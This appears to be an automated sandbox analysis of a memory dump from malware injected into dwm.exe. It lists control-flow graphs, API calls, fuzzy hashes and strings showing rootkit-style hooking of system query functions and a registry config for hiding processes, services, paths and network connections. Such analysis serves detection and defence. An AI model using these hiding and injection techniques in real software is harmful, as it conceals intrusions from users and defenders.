                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 9b98193f4abecebd3cedc8816dec431a1792c86c15235ed78f17ee962988c809
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 94712476710B1186EB54AF66E8816DD23A4FB88B88F455161FF4E43B6CEF3AC484C740
                                                                          Function 000001160CA93790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 033178934247518acb5e229b4bd71b0cdb11f550452f7048632aef5a9a5fdda0
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 30113039705B4182EF589B11E4082E96670F788B85F484065EF9907768EF3EC585C704
                                                                          Function 000001160CA95B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 59 1160ca95b30-1160ca95b57 60 1160ca95b59-1160ca95b68 59->60 61 1160ca95b6b-1160ca95b76 GetCurrentThreadId 59->61 60->61 62 1160ca95b82-1160ca95b89 61->62 63 1160ca95b78-1160ca95b7d 61->63 65 1160ca95b9b-1160ca95baf 62->65 66 1160ca95b8b-1160ca95b96 call 1160ca95960 62->66 64 1160ca95faf-1160ca95fc6 call 1160ca97940 63->64 69 1160ca95bbe-1160ca95bc4 65->69 66->64 72 1160ca95c95-1160ca95cb6 69->72 73 1160ca95bca-1160ca95bd3 69->73 79 1160ca95e1f-1160ca95e30 call 1160ca974bf 72->79 80 1160ca95cbc-1160ca95cdc GetThreadContext 72->80 75 1160ca95bd5-1160ca95c18 call 1160ca985c0 73->75 76 1160ca95c1a-1160ca95c8d call 1160ca94510 call 1160ca944b0 call 1160ca94470 73->76 87 1160ca95c90 75->87 76->87 90 1160ca95e35-1160ca95e3b 79->90 84 1160ca95ce2-1160ca95d03 80->84 85 1160ca95e1a 80->85 84->85 93 1160ca95d09-1160ca95d12 84->93 85->79 87->69 96 1160ca95efe-1160ca95f0e 90->96 97 1160ca95e41-1160ca95e98 VirtualProtect FlushInstructionCache 90->97 94 1160ca95d92-1160ca95da3 93->94 95 1160ca95d14-1160ca95d25 93->95 103 1160ca95e15 94->103 104 1160ca95da5-1160ca95dc3 94->104 99 1160ca95d27-1160ca95d3c 95->99 100 1160ca95d8d 95->100 106 1160ca95f1e-1160ca95f2a call 1160ca94df0 96->106 107 1160ca95f10-1160ca95f17 96->107 101 1160ca95ec9-1160ca95ef9 call 1160ca978ac 97->101 102 1160ca95e9a-1160ca95ea4 97->102 99->100 109 1160ca95d3e-1160ca95d88 call 1160ca93970 SetThreadContext 99->109 100->103 101->90 102->101 110 1160ca95ea6-1160ca95ec1 call 1160ca94390 102->110 104->103 111 1160ca95dc5-1160ca95e10 call 1160ca93900 call 1160ca974dd 104->111 120 1160ca95f2f-1160ca95f35 106->120 107->106 113 1160ca95f19 call 1160ca943e0 107->113 109->100 110->101 111->103 113->106 124 1160ca95f77-1160ca95f95 120->124 125 1160ca95f37-1160ca95f75 ResumeThread call 1160ca978ac 120->125 128 1160ca95f97-1160ca95fa6 124->128 129 1160ca95fa9 124->129 125->120 128->129 129->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction ID: 434fcb51119e4ac6e2baff75b907716165c9b00fc297fbffb68bc511ace73766
                                                                          • Opcode Fuzzy Hash: 2a6939216e4066241bb7d33e143ff6fb32862c5ead5fedc71a002d9303c09c17
                                                                          • Instruction Fuzzy Hash: D1D18936619B8882DA759B06E4953DA77A0F3CCB84F100256EF8D47BA9DF3EC591CB40
                                                                          Function 000001160CA950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 1160ca950d0-1160ca950fc 132 1160ca950fe-1160ca95106 131->132 133 1160ca9510d-1160ca95116 131->133 132->133 134 1160ca95127-1160ca95130 133->134 135 1160ca95118-1160ca95120 133->135 136 1160ca95141-1160ca9514a 134->136 137 1160ca95132-1160ca9513a 134->137 135->134 138 1160ca95156-1160ca95161 GetCurrentThreadId 136->138 139 1160ca9514c-1160ca95151 136->139 137->136 141 1160ca95163-1160ca95168 138->141 142 1160ca9516d-1160ca95174 138->142 140 1160ca956d3-1160ca956da 139->140 141->140 143 1160ca95181-1160ca9518a 142->143 144 1160ca95176-1160ca9517c 142->144 145 1160ca95196-1160ca951a2 143->145 146 1160ca9518c-1160ca95191 143->146 144->140 147 1160ca951ce-1160ca95225 call 1160ca956e0 * 2 145->147 148 1160ca951a4-1160ca951c9 145->148 146->140 153 1160ca95227-1160ca9522e 147->153 154 1160ca9523a-1160ca95243 147->154 148->140 155 1160ca95230 153->155 156 1160ca95236 153->156 157 1160ca95255-1160ca9525e 154->157 158 1160ca95245-1160ca95252 154->158 159 1160ca952b0-1160ca952b6 155->159 160 1160ca952a6-1160ca952aa 156->160 161 1160ca95260-1160ca95270 157->161 162 1160ca95273-1160ca95298 call 1160ca97870 157->162 158->157 164 1160ca952e5-1160ca952eb 159->164 165 1160ca952b8-1160ca952d4 call 1160ca94390 159->165 160->159 161->162 171 1160ca9529e 162->171 172 1160ca9532d-1160ca95342 call 1160ca93cc0 162->172 166 1160ca95315-1160ca95328 164->166 167 1160ca952ed-1160ca9530c call 1160ca978ac 164->167 165->164 174 1160ca952d6-1160ca952de 165->174 166->140 167->166 171->160 178 1160ca95351-1160ca9535a 172->178 179 1160ca95344-1160ca9534c 172->179 174->164 180 1160ca9536c-1160ca953ba call 1160ca98c60 178->180 181 1160ca9535c-1160ca95369 178->181 179->160 184 1160ca953c2-1160ca953ca 180->184 181->180 185 1160ca953d0-1160ca954bb call 1160ca97440 184->185 186 1160ca954d7-1160ca954df 184->186 197 1160ca954bf-1160ca954ce call 1160ca94060 185->197 198 1160ca954bd 185->198 188 1160ca954e1-1160ca954f4 call 1160ca94590 186->188 189 1160ca95523-1160ca9552b 186->189 203 1160ca954f6 188->203 204 1160ca954f8-1160ca95521 188->204 190 1160ca95537-1160ca95546 189->190 191 1160ca9552d-1160ca95535 189->191 195 1160ca9554f 190->195 196 1160ca95548 190->196 191->190 194 1160ca95554-1160ca95561 191->194 201 1160ca95563 194->201 202 1160ca95564-1160ca955b9 call 1160ca985c0 194->202 195->194 196->195 207 1160ca954d0 197->207 208 1160ca954d2 197->208 198->186 201->202 210 1160ca955c8-1160ca95661 call 1160ca94510 call 1160ca94470 VirtualProtect 202->210 211 1160ca955bb-1160ca955c3 202->211 203->189 204->186 207->186 208->184 216 1160ca95671-1160ca956d1 210->216 217 1160ca95663-1160ca95668 GetLastError 210->217 216->140 217->216
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction ID: b5b57bb7076149ec6ec15b0b9582e6043a88fc9cac1626ef523c62cec37fb6bc
                                                                          • Opcode Fuzzy Hash: ab42e8011698989dde6dd516e0bf8dfd7e718f101fabf5710552cbfe92ec9bd4
                                                                          • Instruction Fuzzy Hash: FD02D732619B8486EBA5CB55F49139AB7A1F3C8784F100155FB8E87BA9DF7EC494CB00
                                                                          Function 000001160CA939E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 955432155c5f211c1e188f8270860852f4b459ac956c4d442d1652e3f9e2d060
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E331E13121AB8885EE789B15E0563DEA6A0F38C784F100565BBCD46BADDF7FC5C08B04
                                                                          Function 000001160CA9328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: bf4817d5ecb573b1d4f3c3f5aa86b87a322d7626be9ec505051981a4af069143
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 0F11AD7061130182FF6C9B21F84A3DA22A4E78C305F4082A5BF16815BDEF7BC0C48600
                                                                          Function 000001160CA94DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction ID: 426f4314be6fc704dbd3c5c2a2ece3cab1f133022c7238dccab5964de4d016be
                                                                          • Opcode Fuzzy Hash: 7a47e93f7e79f9067e4e2fc8604941f3a9ad20237d3497da51ea1a98359c40d4
                                                                          • Instruction Fuzzy Hash: 14F0B736228B0480D635DB05E4927DAABA0E3CCBD4F144155BF8D47B6ECA3EC6D18B50
                                                                          Function 000001160CA6273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 265 1160ca6273c-1160ca627a4 call 1160ca629d4 * 4 274 1160ca627aa-1160ca627ad 265->274 275 1160ca629b2 265->275 274->275 276 1160ca627b3-1160ca627b6 274->276 277 1160ca629b4-1160ca629d0 275->277 276->275 278 1160ca627bc-1160ca627bf 276->278 278->275 279 1160ca627c5-1160ca627e6 VirtualAlloc 278->279 279->275 280 1160ca627ec-1160ca6280c 279->280 281 1160ca62838-1160ca6283f 280->281 282 1160ca6280e-1160ca62836 280->282 283 1160ca62845-1160ca62852 281->283 284 1160ca628df-1160ca628e6 281->284 282->281 282->282 283->284 285 1160ca62858-1160ca6286a LoadLibraryA 283->285 286 1160ca628ec-1160ca62901 284->286 287 1160ca62992-1160ca629b0 284->287 288 1160ca6286c-1160ca62878 285->288 289 1160ca628ca-1160ca628d2 285->289 286->287 290 1160ca62907 286->290 287->277 291 1160ca628c5-1160ca628c8 288->291 289->285 292 1160ca628d4-1160ca628d9 289->292 294 1160ca6290d-1160ca62921 290->294 291->289 295 1160ca6287a-1160ca6287d 291->295 292->284 296 1160ca62982-1160ca6298c 294->296 297 1160ca62923-1160ca62934 294->297 300 1160ca628a7-1160ca628b7 295->300 301 1160ca6287f-1160ca628a5 295->301 296->287 296->294 298 1160ca62936-1160ca6293d 297->298 299 1160ca6293f-1160ca62943 297->299 303 1160ca62970-1160ca62980 298->303 304 1160ca6294d-1160ca62951 299->304 305 1160ca62945-1160ca6294b 299->305 306 1160ca628ba-1160ca628c1 300->306 301->306 303->296 303->297 307 1160ca62963-1160ca62967 304->307 308 1160ca62953-1160ca62961 304->308 305->303 306->291 307->303 310 1160ca62969-1160ca6296c 307->310 308->303 310->303
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636838436.000001160CA60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA60000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca60000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 824515c9e048ad3417e9658daf70cb1266b7946d3fb066eb8b17d7491906e60f
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 26610373B01B9087DB58CF5994007EDB3A2F798BA4F588625EF5A0778CDA39D892C700
                                                                          Function 000001160CA91ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001160CA91628: GetProcessHeap.KERNEL32 ref: 000001160CA91633
                                                                            • Part of subcall function 000001160CA91628: HeapAlloc.KERNEL32 ref: 000001160CA91642
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA916B2
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA916DF
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA916F9
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91719
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91734
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91754
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA9176F
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA9178F
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA917AA
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA917CA
                                                                          • Sleep.KERNEL32 ref: 000001160CA91AD7
                                                                          • SleepEx.KERNEL32 ref: 000001160CA91ADD
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA917E5
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91805
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91820
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA91840
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA9185B
                                                                            • Part of subcall function 000001160CA91628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA9187B
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA91896
                                                                            • Part of subcall function 000001160CA91628: RegCloseKey.ADVAPI32 ref: 000001160CA918A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 9881012fa553c27446f3d689fbb38d33500f0266a2bf9d8669fbc936a1160e45
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: E531DF7120074641FF5DAB26DA423ED63A5EB8DBC4F0459A1BF09876AEFE27C8D1C211

                                                                          Non-executed Functions

                                                                          Function 000001160CA92B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 575 1160ca92b2c-1160ca92ba5 call 1160cab2ce0 578 1160ca92ee0-1160ca92f03 575->578 579 1160ca92bab-1160ca92bb1 575->579 579->578 580 1160ca92bb7-1160ca92bba 579->580 580->578 581 1160ca92bc0-1160ca92bc3 580->581 581->578 582 1160ca92bc9-1160ca92bd9 GetModuleHandleA 581->582 583 1160ca92bdb-1160ca92beb call 1160caa6090 582->583 584 1160ca92bed 582->584 586 1160ca92bf0-1160ca92c0e 583->586 584->586 586->578 589 1160ca92c14-1160ca92c33 StrCmpNIW 586->589 589->578 590 1160ca92c39-1160ca92c3d 589->590 590->578 591 1160ca92c43-1160ca92c4d 590->591 591->578 592 1160ca92c53-1160ca92c5a 591->592 592->578 593 1160ca92c60-1160ca92c73 592->593 594 1160ca92c83 593->594 595 1160ca92c75-1160ca92c81 593->595 596 1160ca92c86-1160ca92c8a 594->596 595->596 597 1160ca92c9a 596->597 598 1160ca92c8c-1160ca92c98 596->598 599 1160ca92c9d-1160ca92ca7 597->599 598->599 600 1160ca92d9d-1160ca92da1 599->600 601 1160ca92cad-1160ca92cb0 599->601 604 1160ca92ed2-1160ca92eda 600->604 605 1160ca92da7-1160ca92daa 600->605 602 1160ca92cc2-1160ca92ccc 601->602 603 1160ca92cb2-1160ca92cbf call 1160ca9199c 601->603 607 1160ca92cce-1160ca92cdb 602->607 608 1160ca92d00-1160ca92d0a 602->608 603->602 604->578 604->593 609 1160ca92dbb-1160ca92dc5 605->609 610 1160ca92dac-1160ca92db8 call 1160ca9199c 605->610 607->608 614 1160ca92cdd-1160ca92cea 607->614 615 1160ca92d3a-1160ca92d3d 608->615 616 1160ca92d0c-1160ca92d19 608->616 611 1160ca92df5-1160ca92df8 609->611 612 1160ca92dc7-1160ca92dd4 609->612 610->609 622 1160ca92e05-1160ca92e12 lstrlenW 611->622 623 1160ca92dfa-1160ca92e03 call 1160ca91bbc 611->623 612->611 621 1160ca92dd6-1160ca92de3 612->621 624 1160ca92ced-1160ca92cf3 614->624 618 1160ca92d3f-1160ca92d49 call 1160ca91bbc 615->618 619 1160ca92d4b-1160ca92d58 lstrlenW 615->619 616->615 625 1160ca92d1b-1160ca92d28 616->625 618->619 631 1160ca92d93-1160ca92d98 618->631 627 1160ca92d7b-1160ca92d8d call 1160ca93844 619->627 628 1160ca92d5a-1160ca92d64 619->628 629 1160ca92de6-1160ca92dec 621->629 633 1160ca92e35-1160ca92e3f call 1160ca93844 622->633 634 1160ca92e14-1160ca92e1e 622->634 623->622 640 1160ca92e4a-1160ca92e55 623->640 624->631 632 1160ca92cf9-1160ca92cfe 624->632 635 1160ca92d2b-1160ca92d31 625->635 627->631 643 1160ca92e42-1160ca92e44 627->643 628->627 638 1160ca92d66-1160ca92d79 call 1160ca9152c 628->638 639 1160ca92dee-1160ca92df3 629->639 629->640 631->643 632->608 632->624 633->643 634->633 644 1160ca92e20-1160ca92e33 call 1160ca9152c 634->644 635->631 645 1160ca92d33-1160ca92d38 635->645 638->627 638->631 639->611 639->629 647 1160ca92e57-1160ca92e5b 640->647 648 1160ca92ecc-1160ca92ed0 640->648 643->604 643->640 644->633 644->640 645->615 645->635 652 1160ca92e63-1160ca92e7d call 1160ca985c0 647->652 653 1160ca92e5d-1160ca92e61 647->653 648->604 656 1160ca92e80-1160ca92e83 652->656 653->652 653->656 659 1160ca92e85-1160ca92ea3 call 1160ca985c0 656->659 660 1160ca92ea6-1160ca92ea9 656->660 659->660 660->648 662 1160ca92eab-1160ca92ec9 call 1160ca985c0 660->662 662->648
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: ba0cfe49bb5a227ef72f8b779e404880ff7a11271dfa9d0e2275a6e4cd538248
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 04B16972211B9096EB6C8F25D4827E967A5FB49B84F445296FF09937A8EB37CCC0C740
                                                                          Function 000001160CA97D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 3f34dc0b64f25b586abfce6f138ac04a50128005e3cc8ae63f7b2b4d37e676ef
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 77316272215B808AEB649F60E8417ED7374F788744F44446AEF4D97B98EF3AC688CB10
                                                                          Function 000001160CA9D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 55553a78a1b27a825a8efe9be9c969825aa231a8d9ea9b2d7f20ec6e85906b0d
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 12315B32614B8086EB648F25E8413EE73A4F789758F540166FF9D43BA8DF3AC586CB00
                                                                          Function 000001160CA912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 162b9db3af3e4f0b3a78029389c8c0e2efeab852aa306eb9b8286a8110c41f8a
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 13512A76200B8586EB58CF62E5483DAB7A1F7CDB99F484124EF4A07758DF3AC0858B00
                                                                          Function 000001160CA91D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000021.00000002.3636901438.000001160CA90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA90000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_33_2_1160ca90000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 9c8e68ec56521c736e69b0c90525e1edec2e7508071d60ba112b0ced23c1d8aa
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: DE317178500B4AA0EA0DEB65E8527D86360F78D344FC05693BF4A5296EDF3B86C9C350
                                                                          Function 000001160CA66910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
